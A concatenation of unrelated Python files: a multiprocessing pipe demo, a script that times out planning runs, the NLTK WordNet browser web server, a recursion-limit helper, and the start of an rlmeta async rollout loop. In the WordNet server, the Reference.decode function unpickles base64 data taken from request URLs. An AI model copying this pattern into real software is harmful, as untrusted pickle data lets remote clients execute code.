def double(unused_pipes, in_pipe, out_pipe):
for pipe in unused_pipes:
close, _ = pipe
close.close()
closep, in_conn = in_pipe
closep.close()
out_conn, _ = out_pipe
try:
while True:
x = in_conn.recv()
out_conn.send(x * 2)
except EOFError:
out_conn.close()
def test_pipes():
pipe1 = mp.Pipe(True)
p1 = mp.Process(target=prod, args=(pipe1,))
p1.start()
pipe2 = mp.Pipe(True)
p2 = mp.Process(target=square, args=(pipe1, pipe2,))
p2.start()
pipe3 = mp.Pipe(True)
p3 = mp.Process(target=double, args=([pipe1], pipe2, pipe3,))
p3.start()
pipe1[0].close()
pipe2[0].close()
pipe3[0].close()
try:
while True:
print(pipe3[1].recv())
except EOFError:
print("Finished")
if __name__ == '__main__':
test_pipes()
|
auto_search.py
|
import os
from multiprocessing import Process
import time
runfile = "./run_search.py"
compiler = ['python']
#time limited subprocess
def run_script(i, program, search):
print("Running {} compiler on program {} using search strategy {}...".format(i,program+1,search+1))
os.system('{} {} -p {} -s {} >> planning_output.txt'.format(i,runfile,program+1,search+1))
def script_driver(max_time):
for i in compiler:
for program in range(3):
for search in range(10):
script = Process(target=run_script, args=(i,program,search))
script.start()
run_time = 0
sleep_time = 10
while 1:
time.sleep(sleep_time)
run_time += sleep_time
if not script.is_alive():
break
if run_time > max_time:
script.terminate()
print("...")
os.system('echo "Air Cargo Problem {} using search strategy {}, run time exceeded {} seconds." >> planning_output.txt'.format(program+1, search+1, max_time))
break
def main():
script_driver(600) #max runtime 10 minutes.
if __name__ == "__main__":
main()
|
wordnet_app.py
|
# Natural Language Toolkit: WordNet Browser Application
#
# Copyright (C) 2001-2019 NLTK Project
# Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
# Paul Bone <pbone@students.csse.unimelb.edu.au>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
A WordNet Browser application which launches the default browser
(if it is not already running) and opens a new tab with a connection
to http://localhost:port/ . It also starts an HTTP server on the
specified port and begins serving browser requests. The default
port is 8000. (For command-line help, run "python wordnet -h")
This application requires that the user's web browser supports
Javascript.
BrowServer is a server for browsing the NLTK Wordnet database It first
launches a browser client to be used for browsing and then starts
serving the requests of that and maybe other clients
Usage::
browserver.py -h
browserver.py [-s] [-p <port>]
Options::
-h or --help
Display this help message.
-l <file> or --log-file <file>
Logs messages to the given file, If this option is not specified
messages are silently dropped.
-p <port> or --port <port>
Run the web server on this TCP port, defaults to 8000.
-s or --server-mode
Do not start a web browser, and do not allow a user to
shotdown the server through the web interface.
"""
# TODO: throughout this package variable names and docstrings need
# modifying to be compliant with NLTK's coding standards. Tests also
# need to be develop to ensure this continues to work in the face of
# changes to other NLTK packages.
# Allow this program to run inside the NLTK source tree.
from sys import path
import os
import sys
from sys import argv
from collections import defaultdict
import webbrowser
import datetime
import re
import threading
import time
import getopt
import base64
import pickle
import copy
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import unquote_plus
from nltk.corpus import wordnet as wn
from nltk.corpus.reader.wordnet import Synset, Lemma
# now included in local file
# from util import html_header, html_trailer, \
# get_static_index_page, get_static_page_by_path, \
# page_from_word, page_from_href
firstClient = True
# True if we're not also running a web browser. The value f server_mode
# gets set by demo().
server_mode = None
# If set this is a file object for writting log messages.
logfile = None
class MyServerHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_head()
def do_GET(self):
global firstClient
sp = self.path[1:]
if unquote_plus(sp) == "SHUTDOWN THE SERVER":
if server_mode:
page = "Server must be killed with SIGTERM."
type = "text/plain"
else:
print("Server shutting down!")
os._exit(0)
elif sp == "": # First request.
type = "text/html"
if not server_mode and firstClient:
firstClient = False
page = get_static_index_page(True)
else:
page = get_static_index_page(False)
word = "green"
elif sp.endswith(".html"): # Trying to fetch a HTML file TODO:
type = "text/html"
usp = unquote_plus(sp)
if usp == "NLTK Wordnet Browser Database Info.html":
word = "* Database Info *"
if os.path.isfile(usp):
with open(usp, "r") as infile:
page = infile.read()
else:
page = (
(html_header % word) + "<p>The database info file:"
"<p><b>"
+ usp
+ "</b>"
+ "<p>was not found. Run this:"
+ "<p><b>python dbinfo_html.py</b>"
+ "<p>to produce it."
+ html_trailer
)
else:
# Handle files here.
word = sp
page = get_static_page_by_path(usp)
elif sp.startswith("search"):
# This doesn't seem to work with MWEs.
type = "text/html"
parts = (sp.split("?")[1]).split("&")
word = [
p.split("=")[1].replace("+", " ")
for p in parts
if p.startswith("nextWord")
][0]
page, word = page_from_word(word)
elif sp.startswith("lookup_"):
# TODO add a variation of this that takes a non ecoded word or MWE.
type = "text/html"
sp = sp[len("lookup_") :]
page, word = page_from_href(sp)
elif sp == "start_page":
# if this is the first request we should display help
# information, and possibly set a default word.
type = "text/html"
page, word = page_from_word("wordnet")
else:
type = "text/plain"
page = "Could not parse request: '%s'" % sp
# Send result.
self.send_head(type)
self.wfile.write(page.encode("utf8"))
def send_head(self, type=None):
self.send_response(200)
self.send_header("Content-type", type)
self.end_headers()
def log_message(self, format, *args):
global logfile
if logfile:
logfile.write(
"%s - - [%s] %s\n"
% (self.address_string(), self.log_date_time_string(), format % args)
)
def get_unique_counter_from_url(sp):
"""
Extract the unique counter from the URL if it has one. Otherwise return
null.
"""
pos = sp.rfind("%23")
if pos != -1:
return int(sp[(pos + 3) :])
else:
return None
def wnb(port=8000, runBrowser=True, logfilename=None):
"""
Run NLTK Wordnet Browser Server.
:param port: The port number for the server to listen on, defaults to
8000
:type port: int
:param runBrowser: True to start a web browser and point it at the web
server.
:type runBrowser: bool
"""
# The webbrowser module is unpredictable, typically it blocks if it uses
# a console web browser, and doesn't block if it uses a GUI webbrowser,
# so we need to force it to have a clear correct behaviour.
#
# Normally the server should run for as long as the user wants. they
# should idealy be able to control this from the UI by closing the
# window or tab. Second best would be clicking a button to say
# 'Shutdown' that first shutsdown the server and closes the window or
# tab, or exits the text-mode browser. Both of these are unfreasable.
#
# The next best alternative is to start the server, have it close when
# it receives SIGTERM (default), and run the browser as well. The user
# may have to shutdown both programs.
#
# Since webbrowser may block, and the webserver will block, we must run
# them in separate threads.
#
global server_mode, logfile
server_mode = not runBrowser
# Setup logging.
if logfilename:
try:
logfile = open(logfilename, "a", 1) # 1 means 'line buffering'
except IOError as e:
sys.stderr.write("Couldn't open %s for writing: %s", logfilename, e)
sys.exit(1)
else:
logfile = None
# Compute URL and start web browser
url = "http://localhost:" + str(port)
server_ready = None
browser_thread = None
if runBrowser:
server_ready = threading.Event()
browser_thread = startBrowser(url, server_ready)
# Start the server.
server = HTTPServer(("", port), MyServerHandler)
if logfile:
logfile.write("NLTK Wordnet browser server running serving: %s\n" % url)
if runBrowser:
server_ready.set()
try:
server.serve_forever()
except KeyboardInterrupt:
pass
if runBrowser:
browser_thread.join()
if logfile:
logfile.close()
def startBrowser(url, server_ready):
def run():
server_ready.wait()
time.sleep(1) # Wait a little bit more, there's still the chance of
# a race condition.
webbrowser.open(url, new=2, autoraise=1)
t = threading.Thread(target=run)
t.start()
return t
#####################################################################
# Utilities
#####################################################################
"""
WordNet Browser Utilities.
This provides a backend to both wxbrowse and browserver.py.
"""
################################################################################
#
# Main logic for wordnet browser.
#
# This is wrapped inside a function since wn is only available if the
# WordNet corpus is installed.
def _pos_tuples():
return [
(wn.NOUN, "N", "noun"),
(wn.VERB, "V", "verb"),
(wn.ADJ, "J", "adj"),
(wn.ADV, "R", "adv"),
]
def _pos_match(pos_tuple):
"""
This function returns the complete pos tuple for the partial pos
tuple given to it. It attempts to match it against the first
non-null component of the given pos tuple.
"""
if pos_tuple[0] == "s":
pos_tuple = ("a", pos_tuple[1], pos_tuple[2])
for n, x in enumerate(pos_tuple):
if x is not None:
break
for pt in _pos_tuples():
if pt[n] == pos_tuple[n]:
return pt
return None
HYPONYM = 0
HYPERNYM = 1
CLASS_REGIONAL = 2
PART_HOLONYM = 3
PART_MERONYM = 4
ATTRIBUTE = 5
SUBSTANCE_HOLONYM = 6
SUBSTANCE_MERONYM = 7
MEMBER_HOLONYM = 8
MEMBER_MERONYM = 9
VERB_GROUP = 10
INSTANCE_HYPONYM = 12
INSTANCE_HYPERNYM = 13
CAUSE = 14
ALSO_SEE = 15
SIMILAR = 16
ENTAILMENT = 17
ANTONYM = 18
FRAMES = 19
PERTAINYM = 20
CLASS_CATEGORY = 21
CLASS_USAGE = 22
CLASS_REGIONAL = 23
CLASS_USAGE = 24
CLASS_CATEGORY = 11
DERIVATIONALLY_RELATED_FORM = 25
INDIRECT_HYPERNYMS = 26
def lemma_property(word, synset, func):
def flattern(l):
if l == []:
return []
else:
return l[0] + flattern(l[1:])
return flattern([func(l) for l in synset.lemmas if l.name == word])
def rebuild_tree(orig_tree):
node = orig_tree[0]
children = orig_tree[1:]
return (node, [rebuild_tree(t) for t in children])
def get_relations_data(word, synset):
"""
Get synset relations data for a synset. Note that this doesn't
yet support things such as full hyponym vs direct hyponym.
"""
if synset.pos() == wn.NOUN:
return (
(HYPONYM, "Hyponyms", synset.hyponyms()),
(INSTANCE_HYPONYM, "Instance hyponyms", synset.instance_hyponyms()),
(HYPERNYM, "Direct hypernyms", synset.hypernyms()),
(
INDIRECT_HYPERNYMS,
"Indirect hypernyms",
rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1],
),
# hypernyms', 'Sister terms',
(INSTANCE_HYPERNYM, "Instance hypernyms", synset.instance_hypernyms()),
# (CLASS_REGIONAL, ['domain term region'], ),
(PART_HOLONYM, "Part holonyms", synset.part_holonyms()),
(PART_MERONYM, "Part meronyms", synset.part_meronyms()),
(SUBSTANCE_HOLONYM, "Substance holonyms", synset.substance_holonyms()),
(SUBSTANCE_MERONYM, "Substance meronyms", synset.substance_meronyms()),
(MEMBER_HOLONYM, "Member holonyms", synset.member_holonyms()),
(MEMBER_MERONYM, "Member meronyms", synset.member_meronyms()),
(ATTRIBUTE, "Attributes", synset.attributes()),
(ANTONYM, "Antonyms", lemma_property(word, synset, lambda l: l.antonyms())),
(
DERIVATIONALLY_RELATED_FORM,
"Derivationally related form",
lemma_property(
word, synset, lambda l: l.derivationally_related_forms()
),
),
)
elif synset.pos() == wn.VERB:
return (
(ANTONYM, "Antonym", lemma_property(word, synset, lambda l: l.antonyms())),
(HYPONYM, "Hyponym", synset.hyponyms()),
(HYPERNYM, "Direct hypernyms", synset.hypernyms()),
(
INDIRECT_HYPERNYMS,
"Indirect hypernyms",
rebuild_tree(synset.tree(lambda x: x.hypernyms()))[1],
),
(ENTAILMENT, "Entailments", synset.entailments()),
(CAUSE, "Causes", synset.causes()),
(ALSO_SEE, "Also see", synset.also_sees()),
(VERB_GROUP, "Verb Groups", synset.verb_groups()),
(
DERIVATIONALLY_RELATED_FORM,
"Derivationally related form",
lemma_property(
word, synset, lambda l: l.derivationally_related_forms()
),
),
)
elif synset.pos() == wn.ADJ or synset.pos == wn.ADJ_SAT:
return (
(ANTONYM, "Antonym", lemma_property(word, synset, lambda l: l.antonyms())),
(SIMILAR, "Similar to", synset.similar_tos()),
# Participle of verb - not supported by corpus
(
PERTAINYM,
"Pertainyms",
lemma_property(word, synset, lambda l: l.pertainyms()),
),
(ATTRIBUTE, "Attributes", synset.attributes()),
(ALSO_SEE, "Also see", synset.also_sees()),
)
elif synset.pos() == wn.ADV:
# This is weird. adverbs such as 'quick' and 'fast' don't seem
# to have antonyms returned by the corpus.a
return (
(ANTONYM, "Antonym", lemma_property(word, synset, lambda l: l.antonyms())),
)
# Derived from adjective - not supported by corpus
else:
raise TypeError("Unhandles synset POS type: " + str(synset.pos()))
html_header = """
<!DOCTYPE html PUBLIC '-//W3C//DTD HTML 4.01//EN'
'http://www.w3.org/TR/html4/strict.dtd'>
<html>
<head>
<meta name='generator' content=
'HTML Tidy for Windows (vers 14 February 2006), see www.w3.org'>
<meta http-equiv='Content-Type' content=
'text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: %s</title></head>
<body bgcolor='#F5F5F5' text='#000000'>
"""
html_trailer = """
</body>
</html>
"""
explanation = """
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.
</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
<hr width='100%'>
"""
# HTML oriented functions
def _bold(txt):
return "<b>%s</b>" % txt
def _center(txt):
return "<center>%s</center>" % txt
def _hlev(n, txt):
return "<h%d>%s</h%d>" % (n, txt, n)
def _italic(txt):
return "<i>%s</i>" % txt
def _li(txt):
return "<li>%s</li>" % txt
def pg(word, body):
"""
Return a HTML page of NLTK Browser format constructed from the
word and body
:param word: The word that the body corresponds to
:type word: str
:param body: The HTML body corresponding to the word
:type body: str
:return: a HTML page for the word-body combination
:rtype: str
"""
return (html_header % word) + body + html_trailer
def _ul(txt):
return "<ul>" + txt + "</ul>"
def _abbc(txt):
"""
abbc = asterisks, breaks, bold, center
"""
return _center(_bold("<br>" * 10 + "*" * 10 + " " + txt + " " + "*" * 10))
full_hyponym_cont_text = _ul(_li(_italic("(has full hyponym continuation)"))) + "\n"
def _get_synset(synset_key):
"""
The synset key is the unique name of the synset, this can be
retrived via synset.name()
"""
return wn.synset(synset_key)
def _collect_one_synset(word, synset, synset_relations):
"""
Returns the HTML string for one synset or word
:param word: the current word
:type word: str
:param synset: a synset
:type synset: synset
:param synset_relations: information about which synset relations
to display.
:type synset_relations: dict(synset_key, set(relation_id))
:return: The HTML string built for this synset
:rtype: str
"""
if isinstance(synset, tuple): # It's a word
raise NotImplementedError("word not supported by _collect_one_synset")
typ = "S"
pos_tuple = _pos_match((synset.pos(), None, None))
assert pos_tuple is not None, "pos_tuple is null: synset.pos(): %s" % synset.pos()
descr = pos_tuple[2]
ref = copy.deepcopy(Reference(word, synset_relations))
ref.toggle_synset(synset)
synset_label = typ + ";"
if synset.name() in synset_relations:
synset_label = _bold(synset_label)
s = "<li>%s (%s) " % (make_lookup_link(ref, synset_label), descr)
def format_lemma(w):
w = w.replace("_", " ")
if w.lower() == word:
return _bold(w)
else:
ref = Reference(w)
return make_lookup_link(ref, w)
s += ", ".join(format_lemma(l.name()) for l in synset.lemmas())
gl = " (%s) <i>%s</i> " % (
synset.definition(),
"; ".join('"%s"' % e for e in synset.examples()),
)
return s + gl + _synset_relations(word, synset, synset_relations) + "</li>\n"
def _collect_all_synsets(word, pos, synset_relations=dict()):
"""
Return a HTML unordered list of synsets for the given word and
part of speech.
"""
return "<ul>%s\n</ul>\n" % "".join(
(
_collect_one_synset(word, synset, synset_relations)
for synset in wn.synsets(word, pos)
)
)
def _synset_relations(word, synset, synset_relations):
"""
Builds the HTML string for the relations of a synset
:param word: The current word
:type word: str
:param synset: The synset for which we're building the relations.
:type synset: Synset
:param synset_relations: synset keys and relation types for which to display relations.
:type synset_relations: dict(synset_key, set(relation_type))
:return: The HTML for a synset's relations
:rtype: str
"""
if not synset.name() in synset_relations:
return ""
ref = Reference(word, synset_relations)
def relation_html(r):
if isinstance(r, Synset):
return make_lookup_link(Reference(r.lemma_names()[0]), r.lemma_names()[0])
elif isinstance(r, Lemma):
return relation_html(r.synset())
elif isinstance(r, tuple):
# It's probably a tuple containing a Synset and a list of
# similar tuples. This forms a tree of synsets.
return "%s\n<ul>%s</ul>\n" % (
relation_html(r[0]),
"".join("<li>%s</li>\n" % relation_html(sr) for sr in r[1]),
)
else:
raise TypeError(
"r must be a synset, lemma or list, it was: type(r) = %s, r = %s"
% (type(r), r)
)
def make_synset_html(db_name, disp_name, rels):
synset_html = "<i>%s</i>\n" % make_lookup_link(
copy.deepcopy(ref).toggle_synset_relation(synset, db_name).encode(),
disp_name,
)
if db_name in ref.synset_relations[synset.name()]:
synset_html += "<ul>%s</ul>\n" % "".join(
"<li>%s</li>\n" % relation_html(r) for r in rels
)
return synset_html
html = (
"<ul>"
+ "\n".join(
(
"<li>%s</li>" % make_synset_html(*rel_data)
for rel_data in get_relations_data(word, synset)
if rel_data[2] != []
)
)
+ "</ul>"
)
return html
class Reference(object):
"""
A reference to a page that may be generated by page_word
"""
def __init__(self, word, synset_relations=dict()):
"""
Build a reference to a new page.
word is the word or words (separated by commas) for which to
search for synsets of
synset_relations is a dictionary of synset keys to sets of
synset relation identifaiers to unfold a list of synset
relations for.
"""
self.word = word
self.synset_relations = synset_relations
def encode(self):
"""
Encode this reference into a string to be used in a URL.
"""
# This uses a tuple rather than an object since the python
# pickle representation is much smaller and there is no need
# to represent the complete object.
string = pickle.dumps((self.word, self.synset_relations), -1)
return base64.urlsafe_b64encode(string).decode()
@staticmethod
def decode(string):
"""
Decode a reference encoded with Reference.encode
"""
string = base64.urlsafe_b64decode(string.encode())
word, synset_relations = pickle.loads(string)
return Reference(word, synset_relations)
def toggle_synset_relation(self, synset, relation):
"""
Toggle the display of the relations for the given synset and
relation type.
This function will throw a KeyError if the synset is currently
not being displayed.
"""
if relation in self.synset_relations[synset.name()]:
self.synset_relations[synset.name()].remove(relation)
else:
self.synset_relations[synset.name()].add(relation)
return self
def toggle_synset(self, synset):
"""
Toggle displaying of the relation types for the given synset
"""
if synset.name() in self.synset_relations:
del self.synset_relations[synset.name()]
else:
self.synset_relations[synset.name()] = set()
return self
def make_lookup_link(ref, label):
return '<a href="lookup_%s">%s</a>' % (ref.encode(), label)
def page_from_word(word):
"""
Return a HTML page for the given word.
:type word: str
:param word: The currently active word
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
"""
return page_from_reference(Reference(word))
def page_from_href(href):
"""
Returns a tuple of the HTML page built and the new current word
:param href: The hypertext reference to be solved
:type href: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
"""
return page_from_reference(Reference.decode(href))
def page_from_reference(href):
"""
Returns a tuple of the HTML page built and the new current word
:param href: The hypertext reference to be solved
:type href: str
:return: A tuple (page,word), where page is the new current HTML page
to be sent to the browser and
word is the new current word
:rtype: A tuple (str,str)
"""
word = href.word
pos_forms = defaultdict(list)
words = word.split(",")
words = [w for w in [w.strip().lower().replace(" ", "_") for w in words] if w != ""]
if len(words) == 0:
# No words were found.
return "", "Please specify a word to search for."
# This looks up multiple words at once. This is probably not
# necessary and may lead to problems.
for w in words:
for pos in [wn.NOUN, wn.VERB, wn.ADJ, wn.ADV]:
form = wn.morphy(w, pos)
if form and form not in pos_forms[pos]:
pos_forms[pos].append(form)
body = ""
for pos, pos_str, name in _pos_tuples():
if pos in pos_forms:
body += _hlev(3, name) + "\n"
for w in pos_forms[pos]:
# Not all words of exc files are in the database, skip
# to the next word if a KeyError is raised.
try:
body += _collect_all_synsets(w, pos, href.synset_relations)
except KeyError:
pass
if not body:
body = "The word or words '%s' where not found in the dictonary." % word
return body, word
#####################################################################
# Static pages
#####################################################################
def get_static_page_by_path(path):
"""
Return a static HTML page from the path given.
"""
if path == "index_2.html":
return get_static_index_page(False)
elif path == "index.html":
return get_static_index_page(True)
elif path == "NLTK Wordnet Browser Database Info.html":
return "Display of Wordnet Database Statistics is not supported"
elif path == "upper_2.html":
return get_static_upper_page(False)
elif path == "upper.html":
return get_static_upper_page(True)
elif path == "web_help.html":
return get_static_web_help_page()
elif path == "wx_help.html":
return get_static_wx_help_page()
else:
return "Internal error: Path for static page '%s' is unknown" % path
def get_static_web_help_page():
"""
Return the static web help page.
"""
return """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2019 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv='Content-Type' content='text/html; charset=us-ascii'>
<title>NLTK Wordnet Browser display of: * Help *</title>
</head>
<body bgcolor='#F5F5F5' text='#000000'>
<h2>NLTK Wordnet Browser Help</h2>
<p>The NLTK Wordnet Browser is a tool to use in browsing the Wordnet database. It tries to behave like the Wordnet project's web browser but the difference is that the NLTK Wordnet Browser uses a local Wordnet database.
<p><b>You are using the Javascript client part of the NLTK Wordnet BrowseServer.</b> We assume your browser is in tab sheets enabled mode.</p>
<p>For background information on Wordnet, see the Wordnet project home page: <a href="http://wordnet.princeton.edu/"><b> http://wordnet.princeton.edu/</b></a>. For more information on the NLTK project, see the project home:
<a href="http://nltk.sourceforge.net/"><b>http://nltk.sourceforge.net/</b></a>. To get an idea of what the Wordnet version used by this browser includes choose <b>Show Database Info</b> from the <b>View</b> submenu.</p>
<h3>Word search</h3>
<p>The word to be searched is typed into the <b>New Word</b> field and the search started with Enter or by clicking the <b>Search</b> button. There is no uppercase/lowercase distinction: the search word is transformed to lowercase before the search.</p>
<p>In addition, the word does not have to be in base form. The browser tries to find the possible base form(s) by making certain morphological substitutions. Typing <b>fLIeS</b> as an obscure example gives one <a href="MfLIeS">this</a>. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination.</p>
<p>The result of a search is a display of one or more
<b>synsets</b> for every part of speech in which a form of the
search word was found to occur. A synset is a set of words
having the same sense or meaning. Each word in a synset that is
underlined is a hyperlink which can be clicked to trigger an
automatic search for that word.</p>
<p>Every synset has a hyperlink <b>S:</b> at the start of its
display line. Clicking that symbol shows you the name of every
<b>relation</b> that this synset is part of. Every relation name is a hyperlink that opens up a display for that relation. Clicking it another time closes the display again. Clicking another relation name on a line that has an opened relation closes the open relation and opens the clicked relation.</p>
<p>It is also possible to give two or more words or collocations to be searched at the same time separating them with a comma like this <a href="Mcheer up,clear up">cheer up,clear up</a>, for example. Click the previous link to see what this kind of search looks like and then come back to this page by using the <b>Alt+LeftArrow</b> key combination. As you could see the search result includes the synsets found in the same order than the forms were given in the search field.</p>
<p>
There are also word level (lexical) relations recorded in the Wordnet database. Opening this kind of relation displays lines with a hyperlink <b>W:</b> at their beginning. Clicking this link shows more info on the word in question.</p>
<h3>The Buttons</h3>
<p>The <b>Search</b> and <b>Help</b> buttons need no more explanation. </p>
<p>The <b>Show Database Info</b> button shows a collection of Wordnet database statistics.</p>
<p>The <b>Shutdown the Server</b> button is shown for the first client of the BrowServer program i.e. for the client that is automatically launched when the BrowServer is started but not for the succeeding clients in order to protect the server from accidental shutdowns.
</p></body>
</html>
"""
def get_static_welcome_message():
"""
Get the static welcome page.
"""
return """
<h3>Search Help</h3>
<ul><li>The display below the line is an example of the output the browser
shows you when you enter a search word. The search word was <b>green</b>.</li>
<li>The search result shows for different parts of speech the <b>synsets</b>
i.e. different meanings for the word.</li>
<li>All underlined texts are hypertext links. There are two types of links:
word links and others. Clicking a word link carries out a search for the word
in the Wordnet database.</li>
<li>Clicking a link of the other type opens a display section of data attached
to that link. Clicking that link a second time closes the section again.</li>
<li>Clicking <u>S:</u> opens a section showing the relations for that synset.</li>
<li>Clicking on a relation name opens a section that displays the associated
synsets.</li>
<li>Type a search word in the <b>Next Word</b> field and start the search by the
<b>Enter/Return</b> key or click the <b>Search</b> button.</li>
</ul>
"""
def get_static_index_page(with_shutdown):
"""
Get the static index page.
"""
template = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2019 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<HEAD>
<TITLE>NLTK Wordnet Browser</TITLE>
</HEAD>
<frameset rows="7%%,93%%">
<frame src="%s" name="header">
<frame src="start_page" name="body">
</frameset>
</HTML>
"""
if with_shutdown:
upper_link = "upper.html"
else:
upper_link = "upper_2.html"
return template % upper_link
def get_static_upper_page(with_shutdown):
"""
Return the upper frame page,
If with_shutdown is True then a 'shutdown' button is also provided
to shutdown the server.
"""
template = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<!-- Natural Language Toolkit: Wordnet Interface: Graphical Wordnet Browser
Copyright (C) 2001-2019 NLTK Project
Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
URL: <http://nltk.org/>
For license information, see LICENSE.TXT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Untitled Document</title>
</head>
<body>
<form method="GET" action="search" target="body">
Current Word: <input type="text" id="currentWord" size="10" disabled>
Next Word: <input type="text" id="nextWord" name="nextWord" size="10">
<input name="searchButton" type="submit" value="Search">
</form>
<a target="body" href="web_help.html">Help</a>
%s
</body>
</html>
"""
if with_shutdown:
shutdown_link = '<a href="SHUTDOWN THE SERVER">Shutdown</a>'
else:
shutdown_link = ""
return template % shutdown_link
def usage():
"""
Display the command line help message.
"""
print(__doc__)
def app():
# Parse and interpret options.
(opts, _) = getopt.getopt(
argv[1:], "l:p:sh", ["logfile=", "port=", "server-mode", "help"]
)
port = 8000
server_mode = False
help_mode = False
logfilename = None
for (opt, value) in opts:
if (opt == "-l") or (opt == "--logfile"):
logfilename = str(value)
elif (opt == "-p") or (opt == "--port"):
port = int(value)
elif (opt == "-s") or (opt == "--server-mode"):
server_mode = True
elif (opt == "-h") or (opt == "--help"):
help_mode = True
if help_mode:
usage()
else:
wnb(port, not server_mode, logfilename)
if __name__ == "__main__":
app()
__all__ = ["app"]
|
increase_recursion_limit.py
|
import sys
if "PyPy" in sys.version:
from _continuation import continulet
else:
import threading
def main():
pass
if __name__ == "__main__":
if "PyPy" in sys.version:
def bootstrap(cont):
call, arg = cont.switch()
while True:
call, arg = cont.switch(
to=continulet(lambda _, f, args: f(*args), call, arg)
)
cont = continulet(bootstrap)
cont.switch()
main()
else:
sys.setrecursionlimit(1 << 30)
threading.stack_size(1 << 27)
main_thread = threading.Thread(target=main)
main_thread.start()
main_thread.join()
|
loop.py
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import annotations
import abc
import asyncio
import logging
import time
from typing import Dict, List, NoReturn, Optional, Sequence, Union
import torch
import torch.multiprocessing as mp
import moolib
import rlmeta.core.remote as remote
import rlmeta.utils.asycio_utils as asycio_utils
import rlmeta.utils.moolib_utils as moolib_utils
from rlmeta.agents.agent import Agent, AgentFactory
from rlmeta.core.controller import Controller, ControllerLike, Phase
from rlmeta.core.launchable import Launchable
from rlmeta.envs.env import Env, EnvFactory
class Loop(abc.ABC):
@abc.abstractmethod
def run(self, num_episodes: Optional[int] = None) -> None:
"""
"""
class AsyncLoop(Loop, Launchable):
def __init__(self,
env_factory: EnvFactory,
agent_factory: AgentFactory,
controller: ControllerLike,
running_phase: Phase,
should_update: bool = False,
num_rollouts: int = 1,
index: int = 0,
index_offset: Optional[int] = None,
seed: Optional[int] = None) -> None:
self._running_phase = running_phase
self._should_update = should_update
self._index = index
self._num_rollouts = num_rollouts
if index_offset is None:
self._index_offset = index * num_rollouts
else:
self._index_offset = index_offset
self._seed = seed
self._env_factory = env_factory
self._agent_factory = agent_factory
self._envs = []
self._agents = []
self._controller = controller
self._loop = None
self._tasks = []
self._running = False
@property
def running_phase(self) -> Phase:
return self._running_phase
@property
def should_update(self) -> bool:
return self._should_update
@property
def num_rollouts(self) -> int:
return self._num_rollouts
@property
def index(self) -> int:
return self._index
@property
def index_offset(self) -> int:
return self._index_offset
@property
def seed(self) -> Optional[int]:
return self._seed
@property
def running(self) -> bool:
return self._running
@running.setter
def running(self, running: bool) -> None:
self._running = running
def init_launching(self) -> None:
pass
def init_execution(self) -> None:
for obj_name in dir(self):
obj = getattr(self, obj_name)
if isinstance(obj, remote.Remote):
obj.name = moolib_utils.expend_name_by_index(
obj.name, self.index)
obj.connect()
for obj_name in dir(self):
obj = getattr(self, obj_name)
if isinstance(obj, Launchable):
obj.init_execution()
for i in range(self._num_rollouts):
env = self._env_factory(self.index_offset + i)
if self.seed is not None:
env.seed(self.seed + self.index_offset + i)
self._envs.append(env)
for i in range(self._num_rollouts):
agent = self._agent_factory(self.index_offset + i)
agent.connect()
# if self.seed is not None:
# agent.seed(self.seed + self.index_offset + i)
self._agents.append(agent)
def run(self) -> NoReturn:
self._loop = asyncio.get_event_loop()
self._tasks.append(
asycio_utils.create_task(self._loop, self._check_phase()))
for i, (env, agent) in enumerate(zip(self._envs, self._agents)):
task = asycio_utils.create_task(
self._loop, self._run_loop(env, agent, self.index_offset + i))
self._tasks.append(task)
try:
self._loop.run_forever()
except Exception as e:
logging.error(e)
raise e
finally:
for task in self._tasks:
task.cancel()
self._loop.stop()
async def _check_phase(self) -> NoReturn:
while True:
cur_phase = await self._controller.async_get_phase()
self._running = (cur_phase == self.running_phase)
await asyncio.sleep(1)
async def _run_loop(self,
env: Env,
agent: Agent,
index: int = 0) -> NoReturn:
while True:
while not self.running:
await asyncio.sleep(1)
stats = await self._run_episode(env, agent, index)
if stats is not None:
await self._controller.async_add_episode(stats)
# Similar loop as DeepMind's Acme
# https://github.com/deepmind/acme/blob/master/acme/environment_loop.py#L68
async def _run_episode(self,
env: Env,
agent: Agent,
index: int = 0) -> Optional[Dict[str, float]]:
episode_length = 0
episode_return = 0.0
start_time = time.perf_counter()
